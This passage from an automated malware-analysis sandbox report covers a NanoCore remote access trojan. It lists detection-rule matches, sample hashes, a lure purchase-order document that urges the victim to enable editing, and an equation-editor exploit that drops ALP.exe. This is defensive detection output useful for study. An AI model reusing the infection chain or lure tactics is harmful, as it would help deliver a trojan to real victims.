        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING UP TO TRANSLATE LANGUAGE 7 NO. N1ASF6783 8 PURCHASE ORDER 9 10 CLIENT: ZhOu YU
        Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING UP TO TRANSLATE LANGUAGE 7 NO. N1ASF6783 8 PURCHASE ORDER 9 10 CLIENT: ZhOu YU
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ALP.exeJump to dropped file
        .NET source code contains very large stringsShow sources
        Source: ALP.exe.2.dr, Forms/mainForm.csLong String: Length: 38272
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: smtpsvc.exe.4.dr, Forms/mainForm.csLong String: Length: 38272
        Source: 4.0.ALP.exe.910000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 4.2.ALP.exe.910000.14.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 10.2.ALP.exe.910000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 10.0.ALP.exe.910000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 11.0.smtpsvc.exe.be0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
